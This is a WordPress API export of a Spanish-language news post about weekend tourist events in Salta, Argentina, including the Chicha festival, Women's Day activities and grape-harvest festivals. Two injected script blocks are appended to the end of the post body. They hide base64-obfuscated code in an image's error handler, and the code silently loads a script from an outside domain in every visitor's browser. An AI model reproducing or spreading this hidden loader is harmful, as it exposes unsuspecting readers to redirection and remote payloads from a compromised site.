{"id":3829,"date":"2024-03-07T16:42:16","date_gmt":"2024-03-07T19:42:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3829"},"modified":"2025-08-13T23:58:57","modified_gmt":"2025-08-14T02:58:57","slug":"actividades-turisticas-de-fin-de-semana-en-los-municipios","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3829","title":{"rendered":"Actividades tur\u00edsticas de fin de semana en los municipios"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-93ebf5cd720c5b96116800d0d13e2a10\" style=\"background-color:#b31940\"><em>Este fin de semana se podr\u00e1 disfrutar del 33 Festival Nacional de la Chicha en La Caldera, adem\u00e1s, San Antonio de los Cobres ofrece diversas actividades. En El Carril y en Gral. Ballivi\u00e1n habr\u00e1 actos por el D\u00eda Internacional de la Mujer; en los Valles Calchaqu\u00edes se realizar\u00e1n vendimias.<\/em><\/h4>\n\n\n\n<p>Este fin de semana salte\u00f1os y turistas&nbsp;podr\u00e1n&nbsp;participar de diversas actividades en los municipios salte\u00f1os; en el&nbsp;Complejo Deportivo municipal de&nbsp;La Caldera&nbsp;desde el viernes 8 al domingo 10 se realizar\u00e1 el&nbsp;33 Festival Nacional de la Chicha&nbsp;con una importante cartelera de artistas del folclore.<\/p>\n\n\n\n<p>En la oportunidad se podr\u00e1 disfrutar de artistas nacionales e internacionales, copleros, chicheras, destrezas gauchas y baile popular. Tambi\u00e9n habr\u00e1 ballets locales, el domingo ser\u00e1 la celebraci\u00f3n de la Pachamama y la presentaci\u00f3n de tropillas; asimismo, se realizar\u00e1 un baile popular con presentaci\u00f3n de bandas en vivo y&nbsp;venta de comidas regionales y chicha.<\/p>\n\n\n\n<p>El viernes 8 ser\u00e1 la presentaci\u00f3n del Chaque\u00f1o Palavecino, Luc\u00eda Guanca, Gaby Morales, L\u00e1zaro Caballero; en tanto el s\u00e1bado 9 ser\u00e1 el turno de Paola Arias, los Kjarkas, Las Voces de Or\u00e1n, entre otros importantes artistas; el domingo 10 jineteada y ballets.<\/p>\n\n\n\n<p>Por su parte,&nbsp;San Antonio de los Cobres&nbsp;desde el jueves 7 al domingo 10 se puede participar de recorridos guiados y caminatas por los atractivos del pueblo, adem\u00e1s, visitar al mercado artesanal donde se comparte con las mujeres tejedoras en lana de llama y de oveja. En tanto, en&nbsp;San Luis&nbsp;se realizar\u00e1 el domingo 10 de marzo un Desfile de moda junto a los emprendedores de San Luis.<\/p>\n\n\n\n<p>Con motivo del D\u00eda Internacional de la Mujer, el viernes 8, en los locales&nbsp;adheridos a&nbsp;El Carril&nbsp;de los Sabores se proyectar\u00e1 un video institucional sobre el rol femenino en la cocina, adem\u00e1s, se podr\u00e1 disfrutar de merienda, show y pe\u00f1as. Por el mismo motivo en la plaza San Martin de&nbsp;Gral. Ballivi\u00e1n&nbsp;se llevar\u00e1n a cabo charlas y sorteos.&nbsp;<\/p>\n\n\n\n<p>En el marco de la articulaci\u00f3n p\u00fablico privada y del trabajo con los emprendedores, el s\u00e1bado 9 se realizar\u00e1n dos vendimias:&nbsp;en&nbsp;Cafayate&nbsp;Piatelli Vineyards realizar\u00e1 Los sonidos del vino, la actividad incluye cosecha, espect\u00e1culos en vivo, degustaciones y almuerzo. Por otra parte, en&nbsp;Animan\u00e1&nbsp;la peque\u00f1a bodega&nbsp;Aureum Terra Vinos celebrar\u00e1 la Vendimia Rosa, una jornada especial de cosecha exclusiva para la elaboraci\u00f3n de un vino rosado, pensado para recordar la importancia de realizarse estudios para la detecci\u00f3n temprana del c\u00e1ncer de mama.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/actividades-turisticas-de-fin-de-semana-en-los-municipios-94523\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este fin de semana se podr\u00e1 disfrutar del 33 Festival Nacional de la Chicha en La Caldera, adem\u00e1s, San Antonio de los Cobres ofrece diversas actividades. En El Carril y en Gral. Ballivi\u00e1n habr\u00e1 actos por el D\u00eda Internacional de la Mujer; en los Valles Calchaqu\u00edes se realizar\u00e1n vendimias. Este fin de semana salte\u00f1os y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3830,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3829","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3829"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3829"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3829\/revisions"}],"predecessor-version":[{"id":6829,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3829\/revisions\/6829"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3830"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3829"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3829"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3829"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}